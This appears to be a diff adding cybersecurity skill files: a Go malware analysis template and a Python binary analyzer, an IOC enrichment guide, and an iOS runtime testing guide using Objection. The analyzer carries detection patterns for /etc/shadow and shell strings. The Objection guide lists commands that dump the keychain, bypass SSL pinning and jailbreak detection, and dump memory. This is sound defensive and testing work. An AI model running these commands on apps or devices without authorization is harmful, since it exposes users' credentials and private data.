- [SentinelOne AlphaGolang](https://www.sentinelone.com/labs/alphagolang-a-step-by-step-go-malware-reversing-methodology-for-ida-pro/)
|
||||
- [Go Binary Reversing Notes](https://gist.github.com/0xdevalias/4e430914124c3fd2c51cb7ac2801acba)
|
||||
@@ -0,0 +1,35 @@
|
||||
# Go Malware Analysis Report
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Size | |
|
||||
| Go Version | |
|
||||
| Architecture | amd64 / arm64 / 386 |
|
||||
| Stripped | Yes / No |
|
||||
| Obfuscated | Yes (garble) / No |
|
||||
|
||||
## Recovered Functions
|
||||
| Category | Count | Key Functions |
|
||||
|----------|-------|---------------|
|
||||
| main | | |
|
||||
| networking | | |
|
||||
| crypto | | |
|
||||
| os/exec | | |
|
||||
| third-party | | |
|
||||
|
||||
## Dependencies
|
||||
| Module | Purpose |
|
||||
|--------|---------|
|
||||
| | |
|
||||
|
||||
## C2 Infrastructure
|
||||
| Indicator | Type | Value |
|
||||
|-----------|------|-------|
|
||||
| | URL / IP / Domain | |
|
||||
|
||||
## Recommendations
|
||||
1. Block identified C2 infrastructure
|
||||
2. Create YARA rule for unique Go function signatures
|
||||
3. Monitor for similar Go binary compilation artifacts
|
||||
@@ -0,0 +1,29 @@
|
||||
# Go Binary Analysis Standards
|
||||
|
||||
## Go Binary Structure
|
||||
| Component | Description | Location |
|
||||
|-----------|-------------|----------|
|
||||
| pclntab | PC-to-function mapping table | .gopclntab or .text |
|
||||
| moduledata | Runtime metadata structure | .noptrdata |
|
||||
| itab | Interface method tables | .rodata |
|
||||
| buildinfo | Go version and module info | .go.buildinfo |
|
||||
| typelinks | Type descriptor table | .rodata |
|
||||
|
||||
## pclntab Magic Bytes by Go Version
|
||||
| Magic (bytes as stored on disk) | Go Version |
|
||||
|-------|-----------|
|
||||
| 0xFBFFFFFF | 1.2 - 1.15 |
|
||||
| 0xFAFFFFFF | 1.16 - 1.17 |
|
||||
| 0xF0FFFFFF | 1.18 - 1.19 |
|
||||
| 0xF1FFFFFF | 1.20+ |
|
||||
|
||||
## Common Go Malware Families
|
||||
- Sliver C2 implant
|
||||
- Geacon (Go Cobalt Strike beacon)
|
||||
- GoBruteforcer
|
||||
- Kaiji botnet
|
||||
- Chaos botnet (Go-based)
|
||||
|
||||
## References
|
||||
- [Go Runtime Source](https://github.com/golang/go/tree/master/src/runtime)
|
||||
- [Go Internal ABI](https://go.dev/s/regcallabi)
|
||||
@@ -0,0 +1,37 @@
|
||||
# Go Malware Analysis Workflows
|
||||
|
||||
## Workflow 1: Stripped Binary Recovery
|
||||
```
|
||||
[Stripped Go Binary] --> [Find pclntab] --> [Recover Function Names]
|
||||
|
|
||||
v
|
||||
[Apply GoResolver] --> [Deobfuscate Names]
|
||||
|
|
||||
v
|
||||
[Categorize Functions]
|
||||
```
|
||||
|
||||
## Workflow 2: Full Ghidra Analysis
|
||||
```
|
||||
[Go Binary] --> [Import to Ghidra] --> [Run Go Analysis Scripts]
|
||||
|
|
||||
v
|
||||
[Fix String References]
|
||||
|
|
||||
v
|
||||
[Identify main Package]
|
||||
|
|
||||
v
|
||||
[Analyze C2/Network Logic]
|
||||
```
|
||||
|
||||
## Workflow 3: Dependency-Based Capability Assessment
|
||||
```
|
||||
[Go Binary] --> [Extract Module Info] --> [List Dependencies]
|
||||
|
|
||||
v
|
||||
[Map to Capabilities]
|
||||
|
|
||||
v
|
||||
[Prioritize Analysis]
|
||||
```
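
The "Map to Capabilities" step in Workflow 3 can be approximated with a lookup table keyed by module path prefix. The table below is a small illustrative sample chosen for this example, not a vetted knowledge base, and the capability descriptions are analyst hints rather than conclusions.

```python
# Illustrative module-prefix to capability hints (assumed, incomplete).
CAPABILITY_HINTS = {
    "github.com/gorilla/websocket": "WebSocket channel (possible C2 transport)",
    "github.com/miekg/dns": "custom DNS queries (possible DNS tunnelling)",
    "golang.org/x/crypto": "additional cryptographic primitives",
    "github.com/shirou/gopsutil": "host and process reconnaissance",
    "github.com/kbinani/screenshot": "screen capture",
}


def map_capabilities(dependencies):
    """Group extracted dependency paths under the capability they suggest."""
    findings = {}
    for dep in dependencies:
        for prefix, hint in CAPABILITY_HINTS.items():
            # Match the module itself, a sub-package, or a path@version form.
            if dep == prefix or dep.startswith((prefix + "/", prefix + "@")):
                findings.setdefault(hint, []).append(dep)
    return findings


deps = [
    "github.com/gorilla/websocket",
    "golang.org/x/crypto/chacha20",
    "github.com/spf13/cobra",
]
for hint, modules in map_capabilities(deps).items():
    print(f"{hint}: {', '.join(modules)}")
```

Dependencies with no entry in the table (here `github.com/spf13/cobra`) are simply left unmapped and still need manual review.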
|
||||
@@ -0,0 +1,162 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Go Malware Binary Analyzer
|
||||
|
||||
Extracts metadata, function names, dependencies, and suspicious
|
||||
indicators from Go-compiled malware binaries.
|
||||
|
||||
Usage:
|
||||
python process.py --file malware.exe --output report.json
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import re
|
||||
import struct
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
PCLNTAB_MAGICS = {
|
||||
b'\xf1\xff\xff\xff': "Go 1.20+",
|
||||
b'\xf0\xff\xff\xff': "Go 1.18-1.19",
|
||||
b'\xfa\xff\xff\xff': "Go 1.16-1.17",
|
||||
b'\xfb\xff\xff\xff': "Go 1.2-1.15",
|
||||
}
|
||||
|
||||
|
||||
def find_pclntab(data):
|
||||
for magic, version in PCLNTAB_MAGICS.items():
|
||||
offset = data.find(magic)
|
||||
if offset != -1:
|
||||
return offset, version
|
||||
return None, None
|
||||
|
||||
|
||||
def extract_go_version(data):
|
||||
match = re.search(rb'go(\d+\.\d+(?:\.\d+)?)', data)
|
||||
return match.group(1).decode() if match else "unknown"
|
||||
|
||||
|
||||
def extract_functions(data):
|
||||
func_pattern = re.compile(
|
||||
rb'((?:main|runtime|fmt|net|os|crypto|encoding|io|sync|'
|
||||
rb'syscall|reflect|strings|bytes|path|time|math|sort|'
|
||||
rb'github\.com|golang\.org|gopkg\.in)[/\.][\w/.]+)'
|
||||
)
|
||||
functions = set()
|
||||
for match in func_pattern.finditer(data):
|
||||
name = match.group(1).decode('utf-8', errors='replace')
|
||||
if 4 < len(name) < 200:
|
||||
functions.add(name)
|
||||
return sorted(functions)
|
||||
|
||||
|
||||
def extract_dependencies(data):
|
||||
dep_pattern = re.compile(
|
||||
rb'((?:github\.com|gitlab\.com|golang\.org|gopkg\.in|'
|
||||
rb'go\.etcd\.io|google\.golang\.org)/[\w./-]{5,80})'
|
||||
)
|
||||
deps = set()
|
||||
for match in dep_pattern.finditer(data):
|
||||
dep = match.group(1).decode('utf-8', errors='replace')
|
||||
# Clean up trailing artifacts
|
||||
dep = dep.rstrip('/.')
|
||||
deps.add(dep)
|
||||
return sorted(deps)
|
||||
|
||||
|
||||
def extract_suspicious_strings(data):
|
||||
interesting_patterns = [
|
||||
rb'https?://[\w./:?&=-]+',
|
||||
rb'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?::\d+)?',
|
||||
rb'(?:cmd|powershell|bash|sh)(?:\.exe)?',
|
||||
rb'(?:HKLM|HKCU)\\[^\x00]+',
|
||||
rb'/etc/(?:passwd|shadow|crontab)',
|
||||
]
|
||||
|
||||
results = {}
|
||||
for pattern in interesting_patterns:
|
||||
matches = re.findall(pattern, data)
|
||||
if matches:
|
||||
decoded = [m.decode('utf-8', errors='replace') for m in matches]
|
||||
results[pattern.decode('utf-8', errors='replace')] = list(set(decoded))
|
||||
|
||||
return results
|
||||
|
||||
|
||||
def categorize_functions(functions):
|
||||
categories = {
|
||||
"main_logic": [],
|
||||
"networking": [],
|
||||
"cryptography": [],
|
||||
"os_execution": [],
|
||||
"file_operations": [],
|
||||
"third_party": [],
|
||||
"runtime": [],
|
||||
}
|
||||
|
||||
for func in functions:
|
||||
fl = func.lower()
|
||||
if func.startswith('main.'):
|
||||
categories["main_logic"].append(func)
|
||||
elif any(x in fl for x in ['net/', 'http', 'tcp', 'udp', 'dns']):
|
||||
categories["networking"].append(func)
|
||||
elif 'crypto' in fl:
|
||||
categories["cryptography"].append(func)
|
||||
elif any(x in fl for x in ['os/exec', 'syscall']):
|
||||
categories["os_execution"].append(func)
|
||||
elif any(x in fl for x in ['os.', 'io/', 'ioutil']):
|
||||
categories["file_operations"].append(func)
|
||||
elif any(x in fl for x in ['github.com', 'golang.org', 'gopkg.in']):
|
||||
categories["third_party"].append(func)
|
||||
elif func.startswith('runtime.'):
|
||||
categories["runtime"].append(func)
|
||||
|
||||
return {k: v for k, v in categories.items() if v}
|
||||
|
||||
|
||||
def analyze(filepath):
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
report = {
|
||||
"file": str(filepath),
|
||||
"size": len(data),
|
||||
"go_version": extract_go_version(data),
|
||||
}
|
||||
|
||||
pclntab_offset, pclntab_version = find_pclntab(data)
|
||||
report["pclntab"] = {
|
||||
"offset": f"0x{pclntab_offset:x}" if pclntab_offset is not None else None,
|
||||
"version": pclntab_version,
|
||||
}
|
||||
|
||||
functions = extract_functions(data)
|
||||
report["total_functions"] = len(functions)
|
||||
report["function_categories"] = categorize_functions(functions)
|
||||
|
||||
report["dependencies"] = extract_dependencies(data)
|
||||
report["suspicious_strings"] = extract_suspicious_strings(data)
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Go Malware Analyzer")
|
||||
parser.add_argument("--file", required=True, help="Go binary to analyze")
|
||||
parser.add_argument("--output", help="Output JSON report")
|
||||
|
||||
args = parser.parse_args()
|
||||
report = analyze(args.file)
|
||||
|
||||
print(json.dumps(report, indent=2))
|
||||
|
||||
if args.output:
|
||||
with open(args.output, 'w') as f:
|
||||
json.dump(report, f, indent=2)
|
||||
print(f"\n[+] Report saved to {args.output}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,148 @@
|
||||
---
|
||||
name: analyzing-indicators-of-compromise
|
||||
description: >
|
||||
Analyzes indicators of compromise (IOCs) including IP addresses, domains, file hashes, URLs,
|
||||
and email artifacts to determine maliciousness confidence, campaign attribution, and blocking
|
||||
priority. Use when triaging IOCs from phishing emails, security alerts, or external threat feeds;
|
||||
enriching raw IOCs with multi-source intelligence; or making block/monitor/whitelist decisions.
|
||||
Activates for requests involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [IOC, VirusTotal, AbuseIPDB, MalwareBazaar, MISP, threat-intelligence, STIX, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Indicators of Compromise
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- A phishing email or alert generates IOCs (URLs, IP addresses, file hashes) requiring rapid triage
|
||||
- Automated feeds deliver bulk IOCs that need confidence scoring before ingestion into blocking controls
|
||||
- An incident investigation requires contextual enrichment of observed network artifacts
|
||||
|
||||
**Do not use** this skill in isolation for high-stakes blocking decisions — always combine automated enrichment with analyst judgment, especially for shared infrastructure (CDNs, cloud providers).
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- VirusTotal API key (free or Enterprise) for multi-AV and sandbox lookup
|
||||
- AbuseIPDB API key for IP reputation checks
|
||||
- MISP instance or TIP for cross-referencing against known campaigns
|
||||
- Python with `requests` and `vt-py` libraries, or SOAR platform with pre-built connectors
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Normalize and Classify IOC Types
|
||||
|
||||
Before enriching, classify each IOC:
|
||||
- **IPv4/IPv6 address**: Validate the format, then check whether the address is private (RFC 1918 for IPv4, RFC 4193 unique local for IPv6) and skip external enrichment if so
|
||||
- **Domain/FQDN**: Defang for safe handling (`evil[.]com`), extract registered domain via tldextract
|
||||
- **URL**: Extract domain + path separately; check for redirectors
|
||||
- **File hash**: Identify hash type (MD5/SHA-1/SHA-256); prefer SHA-256 for uniqueness
|
||||
- **Email address**: Split into domain (check MX/DMARC) and local part for pattern analysis
|
||||
|
||||
Defang IOCs in documentation (replace `.` with `[.]` and `://` with `[://]`) to prevent accidental clicks.
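
The classification and defanging rules above can be sketched with the standard library alone. This is a simplified illustration: `classify` and `defang` are hypothetical helper names, the domain regex is deliberately loose, and `ipaddress.is_private` covers more reserved ranges than RFC 1918 alone (loopback and link-local, for example). Extracting the registered domain still needs a public-suffix-aware library such as tldextract.

```python
import ipaddress
import re

HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.IGNORECASE
)


def classify(ioc):
    """Return (ioc_type, scope); scope is only set for IP addresses."""
    value = ioc.strip()
    try:
        ip = ipaddress.ip_address(value)
        return f"ipv{ip.version}", "private" if ip.is_private else "public"
    except ValueError:
        pass  # not an IP address, keep trying other types
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HASH_TYPES:
        return HASH_TYPES[len(value)], None
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):
        return "url", None
    if "@" in value:
        return "email", None
    if DOMAIN_RE.match(value):
        return "domain", None
    return "unknown", None


def defang(ioc):
    """Make an IOC non-clickable for use in reports and tickets."""
    return ioc.replace("://", "[://]").replace(".", "[.]")


for raw in ["10.0.0.5", "8.8.8.8", "http://evil.com/login", "evil.com",
            "d41d8cd98f00b204e9800998ecf8427e"]:
    print(classify(raw), defang(raw))
```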
|
||||
|
||||
### Step 2: Multi-Source Enrichment
|
||||
|
||||
**VirusTotal (file hash, URL, IP, domain)**:
|
||||
```python
|
||||
import vt
|
||||
|
||||
client = vt.Client("YOUR_VT_API_KEY")
|
||||
|
||||
# File hash lookup
|
||||
file_obj = client.get_object(f"/files/{sha256_hash}")
|
||||
detections = file_obj.last_analysis_stats
|
||||
print(f"Malicious: {detections['malicious']}/{sum(detections.values())}")
|
||||
|
||||
# Domain analysis
|
||||
domain_obj = client.get_object(f"/domains/{domain}")
|
||||
print(domain_obj.last_analysis_stats)
|
||||
print(domain_obj.reputation)
|
||||
client.close()
|
||||
```
|
||||
|
||||
**AbuseIPDB (IP addresses)**:
|
||||
```python
|
||||
import requests
|
||||
|
||||
response = requests.get(
|
||||
"https://api.abuseipdb.com/api/v2/check",
|
||||
headers={"Key": "YOUR_KEY", "Accept": "application/json"},
|
||||
params={"ipAddress": "1.2.3.4", "maxAgeInDays": 90}
|
||||
)
|
||||
data = response.json()["data"]
|
||||
print(f"Confidence: {data['abuseConfidenceScore']}%, Reports: {data['totalReports']}")
|
||||
```
|
||||
|
||||
**MalwareBazaar (file hashes)**:
|
||||
```python
|
||||
response = requests.post(
|
||||
"https://mb-api.abuse.ch/api/v1/",
|
||||
data={"query": "get_info", "hash": sha256_hash}
|
||||
)
|
||||
result = response.json()
|
||||
if result["query_status"] == "ok":
|
||||
print(result["data"][0]["tags"], result["data"][0]["signature"])
|
||||
```
|
||||
|
||||
### Step 3: Contextualize with Campaign Attribution
|
||||
|
||||
Query MISP for existing events matching the IOC:
|
||||
```python
|
||||
from pymisp import PyMISP
|
||||
|
||||
misp = PyMISP("https://misp.example.com", "API_KEY")
|
||||
results = misp.search(value="evil-domain.com", type_attribute="domain")
|
||||
for event in results:
|
||||
print(event["Event"]["info"], event["Event"]["threat_level_id"])
|
||||
```
|
||||
|
||||
Check Shodan for IP context (hosting provider, open ports, banners) to identify if the IP belongs to bulletproof hosting or a legitimate cloud provider (false positive risk).
|
||||
|
||||
### Step 4: Assign Confidence Score and Disposition
|
||||
|
||||
Apply a tiered decision framework:
|
||||
- **Block (High Confidence ≥ 70%)**: ≥15 AV detections on VT, AbuseIPDB score ≥70, matches known malware family or campaign
|
||||
- **Monitor/Alert (Medium 40–69%)**: 5–14 AV detections, moderate AbuseIPDB score, no campaign attribution
|
||||
- **Whitelist/Investigate (Low <40%)**: ≤4 AV detections, no abuse reports, legitimate service (Google, Cloudflare CDN IPs)
|
||||
- **False Positive**: Legitimate business service incorrectly flagged; document and exclude from future alerts
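
The tiers above can be expressed as a small decision function. The thresholds come from the list, but how the signals combine is an assumption made here: any single strong signal is treated as sufficient to block, and a "moderate" AbuseIPDB score is taken to mean 40 to 69. The `disposition` function and its parameter names are hypothetical.

```python
def disposition(vt_malicious, abuse_score=0, known_campaign=False, allowlisted=False):
    """Return a disposition for one IOC based on enrichment results."""
    if allowlisted:
        # Known legitimate business service: document and exclude.
        return "false_positive"
    if vt_malicious >= 15 or abuse_score >= 70 or known_campaign:
        return "block"
    if vt_malicious >= 5 or abuse_score >= 40:
        return "monitor"
    # Low confidence: keep for analyst review rather than silently dropping.
    return "investigate"


examples = [
    {"vt_malicious": 22, "abuse_score": 95},
    {"vt_malicious": 7, "abuse_score": 10},
    {"vt_malicious": 0, "abuse_score": 0},
    {"vt_malicious": 3, "abuse_score": 0, "allowlisted": True},
]
for signals in examples:
    print(signals, "->", disposition(**signals))
```

The function only encodes the automated part of the decision. As stated under "When to Use", high-stakes blocks on shared infrastructure still need analyst judgment.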
|
||||
|
||||
### Step 5: Document and Distribute
|
||||
|
||||
Record findings in TIP/MISP with:
|
||||
- All enrichment data collected (timestamps, source, score)
|
||||
- Disposition decision and rationale
|
||||
- Blocking actions taken (firewall, proxy, DNS sinkhole)
|
||||
- Related incident ticket number
|
||||
|
||||
Export to STIX indicator object with confidence field set appropriately.
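
A minimal STIX 2.1 indicator can be assembled as plain JSON without extra libraries. This sketch sets the properties STIX 2.1 requires for an indicator plus `confidence`, and derives `valid_until` from the TTLs suggested in this document's Key Concepts table (30 days for IPs, 90 for domains). The helper names are hypothetical, and the pattern builder does not escape quotes or backslashes in the value.

```python
import json
import uuid
from datetime import datetime, timedelta, timezone

# TTLs in days, keyed by STIX cyber-observable type (values from this skill).
TTL_DAYS = {"ipv4-addr": 30, "domain-name": 90}


def stix_timestamp(dt):
    """Format a UTC datetime as a STIX timestamp with millisecond precision."""
    return dt.strftime("%Y-%m-%dT%H:%M:%S.000Z")


def build_indicator(ioc_type, value, confidence, now=None):
    """Build a STIX 2.1 indicator dict for a single-value IOC."""
    now = now or datetime.now(timezone.utc)
    indicator = {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": stix_timestamp(now),
        "modified": stix_timestamp(now),
        "pattern": f"[{ioc_type}:value = '{value}']",
        "pattern_type": "stix",
        "valid_from": stix_timestamp(now),
        "confidence": confidence,  # integer 0-100
    }
    ttl = TTL_DAYS.get(ioc_type)
    if ttl:
        indicator["valid_until"] = stix_timestamp(now + timedelta(days=ttl))
    return indicator


fixed_now = datetime(2024, 1, 15, tzinfo=timezone.utc)
indicator = build_indicator("domain-name", "evil.example", 85, now=fixed_now)
print(json.dumps(indicator, indent=2))
```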
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **IOC** | Indicator of Compromise — observable network or host artifact indicating potential compromise |
|
||||
| **Enrichment** | Process of adding contextual data to a raw IOC from multiple intelligence sources |
|
||||
| **Defanging** | Modifying IOCs (replacing `.` with `[.]`) to prevent accidental activation in documentation |
|
||||
| **False Positive Rate** | Percentage of benign artifacts incorrectly flagged as malicious; critical for tuning block thresholds |
|
||||
| **Sinkhole** | DNS server redirecting malicious domain lookups to a benign IP for detection without blocking traffic entirely |
|
||||
| **TTL** | Time-to-live for an IOC in blocking controls; IP indicators should expire after 30 days, domains after 90 days |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **VirusTotal**: Multi-engine malware scanner and threat intelligence platform with 70+ AV engines, sandbox reports, and community comments
|
||||
- **AbuseIPDB**: Community-maintained IP reputation database with 90-day abuse report history
|
||||
- **MalwareBazaar (abuse.ch)**: Free malware hash repository with YARA rule associations and malware family tagging
|
||||
- **URLScan.io**: Free URL analysis service that captures screenshots, DOM, and network requests for phishing URL triage
|
||||
- **Shodan**: Internet-wide scan data providing hosting provider, open ports, and banner information for IP enrichment
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **Blocking shared infrastructure**: CDN IPs (Cloudflare 104.21.x.x, AWS CloudFront) may serve malicious content alongside thousands of legitimate sites, so blocking the IP disrupts all of them.
|
||||
- **VT score obsession**: Low VT detection count does not mean benign — zero-day malware and custom APT tools often score 0 initially. Check sandbox behavior, MISP, and passive DNS.
|
||||
- **Missing defanging**: Pasting live IOCs in emails or Confluence docs can trigger automated URL scanners or phishing tools.
|
||||
- **No expiration policy**: IOCs without TTLs accumulate in blocklists indefinitely, generating false positives as infrastructure is repurposed by legitimate users.
|
||||
- **Over-relying on single source**: VirusTotal aggregates AV opinions — all may be wrong or lag behind emerging malware. Use 3+ independent sources for high-stakes decisions.
|
||||
@@ -0,0 +1,186 @@
|
||||
---
|
||||
name: analyzing-ios-app-security-with-objection
|
||||
description: >
|
||||
Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered
|
||||
toolkit that enables security testers to interact with app internals without jailbreaking. Use when
|
||||
assessing iOS app security posture, bypassing client-side protections, dumping keychain items,
|
||||
inspecting filesystem storage, and evaluating runtime behavior. Activates for requests involving
|
||||
iOS security testing, Objection runtime analysis, Frida-based iOS assessment, or mobile runtime
|
||||
exploration.
|
||||
domain: cybersecurity
|
||||
subdomain: mobile-security
|
||||
author: mahipal
|
||||
tags: [mobile-security, ios, objection, frida, owasp-mobile, penetration-testing]
|
||||
version: 1.0.0
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing iOS App Security with Objection
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Performing runtime security assessment of iOS applications during authorized penetration tests
|
||||
- Inspecting iOS keychain, filesystem, and memory for sensitive data exposure
|
||||
- Bypassing client-side security controls (SSL pinning, jailbreak detection) during security testing
|
||||
- Evaluating iOS app behavior at runtime without access to source code
|
||||
|
||||
**Do not use** this skill on production devices without explicit authorization -- Objection modifies app runtime behavior and may trigger security monitoring.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.10+ with pip
|
||||
- Objection installed: `pip install objection`
|
||||
- Frida installed: `pip install frida-tools`
|
||||
- Target iOS device (jailbroken with Frida server, or non-jailbroken with repackaged IPA)
|
||||
- For non-jailbroken: `objection patchipa` to inject Frida gadget into IPA
|
||||
- macOS recommended for iOS testing (Xcode, ideviceinstaller)
|
||||
- USB connection to target device or network Frida server
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Prepare the Testing Environment
|
||||
|
||||
**For jailbroken devices:**
|
||||
```bash
|
||||
# Install Frida server on device via Cydia/Sileo
|
||||
# SSH to device and start Frida server
|
||||
ssh root@<device_ip> "/usr/sbin/frida-server -D"
|
||||
|
||||
# Verify Frida connectivity
|
||||
frida-ps -U # List processes on USB-connected device
|
||||
```
|
||||
|
||||
**For non-jailbroken devices (authorized testing):**
|
||||
```bash
|
||||
# Patch IPA with Frida gadget
|
||||
objection patchipa --source target.ipa --codesign-signature "Apple Development: test@example.com"
|
||||
|
||||
# Install patched IPA
|
||||
ideviceinstaller -i target-patched.ipa
|
||||
```
|
||||
|
||||
### Step 2: Attach Objection to Target App
|
||||
|
||||
```bash
|
||||
# Attach to running app by bundle ID
|
||||
objection --gadget "com.target.app" explore
|
||||
|
||||
# Or run an Objection command automatically as soon as the session starts
|
||||
objection --gadget "com.target.app" explore --startup-command "ios hooking list classes"
|
||||
```
|
||||
|
||||
Once attached, Objection provides an interactive REPL for runtime exploration.
|
||||
|
||||
### Step 3: Assess Data Storage Security (MASVS-STORAGE)
|
||||
|
||||
```bash
|
||||
# Dump iOS Keychain items accessible to the app
|
||||
ios keychain dump
|
||||
|
||||
# Read the app's Info.plist and show the sandbox directory paths
|
||||
ios plist cat Info.plist
|
||||
env # Show app environment paths
|
||||
|
||||
# Inspect NSUserDefaults for sensitive data
|
||||
ios nsuserdefaults get
|
||||
|
||||
# Connect to a SQLite database in the sandbox and query it
|
||||
sqlite connect app_data.db
|
||||
sqlite execute query "SELECT * FROM credentials"
|
||||
|
||||
# Check for sensitive data in pasteboard
|
||||
ios pasteboard monitor
|
||||
```
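
When reviewing `ios keychain dump` output, the accessibility attribute of each item indicates when the item can be read. The following is a minimal triage sketch: the `kSecAttrAccessible*` names are Apple's constants, but the `rate_accessibility` helper and its risk labels are illustrative assumptions, not an OWASP or Objection rating.

```python
# Hypothetical triage helper; the risk labels are assumptions of this sketch.
ACCESSIBILITY_RISK = {
    # Readable even while the device is locked (deprecated by Apple).
    "kSecAttrAccessibleAlways": "HIGH",
    "kSecAttrAccessibleAlwaysThisDeviceOnly": "HIGH",
    # Readable after the first unlock following boot.
    "kSecAttrAccessibleAfterFirstUnlock": "MEDIUM",
    "kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly": "MEDIUM",
    # Readable only while the device is unlocked.
    "kSecAttrAccessibleWhenUnlocked": "LOW",
    "kSecAttrAccessibleWhenUnlockedThisDeviceOnly": "LOW",
    "kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly": "LOW",
}


def rate_accessibility(value: str) -> str:
    """Map an accessibility value (full constant or bare suffix) to a risk label."""
    name = value.strip()
    if not name.startswith("kSecAttrAccessible"):
        name = "kSecAttrAccessible" + name
    return ACCESSIBILITY_RISK.get(name, "UNKNOWN")


if __name__ == "__main__":
    for sample in ("kSecAttrAccessibleAlways", "AfterFirstUnlock", "WhenUnlocked"):
        print(sample, "->", rate_accessibility(sample))
```

Treat the labels as a starting point for the Keychain Analysis table in the report, and adjust them to the sensitivity of the stored data.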
|
||||
|
||||
### Step 4: Evaluate Network Security (MASVS-NETWORK)
|
||||
|
||||
```bash
# Disable SSL/TLS certificate pinning
ios sslpinning disable

# Verify pinning is bypassed by observing traffic in Burp Suite proxy

# Monitor network-related class method calls
ios hooking watch class NSURLSession
ios hooking watch class NSURLConnection
```
|
||||
|
||||
### Step 5: Inspect Authentication and Authorization (MASVS-AUTH)
|
||||
|
||||
```bash
# List all Objective-C classes
ios hooking list classes

# Search for authentication-related classes
ios hooking search classes Auth
ios hooking search classes Login
ios hooking search classes Token

# Hook authentication methods to observe parameters
ios hooking watch method "+[AuthManager validateToken:]" --dump-args --dump-return

# Monitor biometric authentication calls
ios hooking watch class LAContext
```
|
||||
|
||||
### Step 6: Assess Binary Protections (MASVS-RESILIENCE)
|
||||
|
||||
```bash
# Attempt to bypass the app's jailbreak detection
ios jailbreak disable

# Simulate a jailbroken environment to observe how the app reacts
ios jailbreak simulate

# List loaded frameworks and libraries
memory list modules

# Search memory for sensitive strings
memory search "password" --string
memory search "api_key" --string
memory search "Bearer" --string

# Dump all readable process memory to a local destination
memory dump all dump_output/
```
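
Searching memory for fixed strings such as `Bearer` finds token prefixes but not whole tokens. As a sketch of offline follow-up analysis, the helper below scans raw bytes (for example a file written by `memory dump`) for JWT-shaped values and decodes only the header. The function name `find_jwts`, the regular expression, and the minimum segment length are assumptions of this example, not part of Objection.

```python
import base64
import json
import re

# JWT-like pattern: two base64url segments starting with "eyJ" (an encoded '{"'),
# followed by an optional signature segment.
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]{5,}\.eyJ[A-Za-z0-9_-]{5,}\.[A-Za-z0-9_-]*")


def _b64url_decode(segment: bytes) -> bytes:
    """Decode base64url data, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + b"=" * (-len(segment) % 4))


def find_jwts(blob: bytes) -> list:
    """Return offset, length, and header 'alg' for each JWT-like value in blob."""
    results = []
    for match in JWT_RE.finditer(blob):
        header_b64 = match.group(0).split(b".")[0]
        try:
            header = json.loads(_b64url_decode(header_b64))
        except ValueError:  # covers bad base64, bad UTF-8, and bad JSON
            continue
        if isinstance(header, dict):
            results.append({
                "offset": match.start(),
                "length": len(match.group(0)),
                "alg": header.get("alg"),
            })
    return results
```

The sketch reports offsets and algorithms rather than token values, so the findings can be recorded in the Memory Analysis table without copying live credentials into the report.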
|
||||
|
||||
### Step 7: Review Platform Interaction (MASVS-PLATFORM)
|
||||
|
||||
```bash
# Inspect binary information and bundled frameworks
ios info binary
ios bundles list_frameworks

# Hook URL scheme handlers
ios hooking watch method "-[AppDelegate application:openURL:options:]" --dump-args

# Monitor clipboard access
ios pasteboard monitor

# Find text-input classes to review custom keyboard restrictions
ios hooking search classes UITextField
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|-----------|
| **Objection** | Runtime mobile exploration toolkit built on Frida that provides pre-built scripts for common security testing tasks |
| **Frida Gadget** | Shared library injected into app process to enable Frida instrumentation without jailbreak |
| **Keychain** | iOS secure credential storage system; Objection can dump items accessible to the target app's keychain access group |
| **SSL Pinning Bypass** | Runtime modification of certificate validation logic to allow proxy interception of HTTPS traffic |
| **Method Hooking** | Intercepting Objective-C/Swift method calls at runtime to observe arguments, return values, and modify behavior |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Objection**: High-level Frida-powered mobile security exploration toolkit with pre-built commands
- **Frida**: Dynamic instrumentation framework providing JavaScript injection into native app processes
- **Frida-tools**: CLI utilities for Frida including frida-ps, frida-trace, and frida-discover
- **ideviceinstaller**: Cross-platform tool for installing/managing iOS apps via USB
- **Burp Suite**: HTTP proxy for intercepting traffic after SSL pinning bypass
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **App crashes on attach**: Some apps implement Frida detection. Use `--startup-command` to hook anti-Frida checks early in the app lifecycle.
